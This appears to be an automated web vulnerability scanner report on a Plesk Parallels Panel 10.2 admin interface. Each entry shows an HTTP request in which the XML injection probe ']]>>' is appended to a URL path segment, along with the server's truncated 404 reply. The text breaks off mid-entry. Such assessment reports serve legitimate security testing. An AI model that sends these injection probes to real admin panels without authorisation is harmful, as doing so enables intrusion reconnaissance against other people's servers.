GET /javascript]]>>/main.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:17 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/main.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/main.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:19 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/main.leIE7.fixes.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/main.leIE7.fixes.js HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/main.leIE7.fixes.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/main.leIE7.fixes.js]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:16 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/tooltip.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/tooltip.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:04 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/tooltip.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/tooltip.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:06 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/widget.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/widget.js HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/widget.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/widget.js]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/left.php3
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /left.php3]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: psaContext=dashboard; PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:36 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/license.php3
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /license.php3]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:26:15 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login.php3
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /login.php3]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:02:31 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /login_up.php3]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:24:03 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/logout.php3
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /logout.php3]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:47 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/admin-info/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /plesk]]>>/admin-info/?context=personal-info HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:14:21 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/schedule/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/preferences
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /plesk]]>>/reseller@3/preferences?context=interface-pref HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=reseller-tools
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:35:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/report/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /plesk]]>>/reseller@3/report/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:40:12 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/report/layout@2/properties/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /plesk]]>>/reseller@3/report/layout@2/properties/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: reseller_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:42:49 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:27 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:29 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/custom.css
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins]]>>/default/css/admin/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/custom.css
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default]]>>/css/admin/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:20 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/custom.css
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css]]>>/admin/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/custom.css
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /skins/default/css/admin]]>>/custom.css HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/skins/default/css/admin/custom.css
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
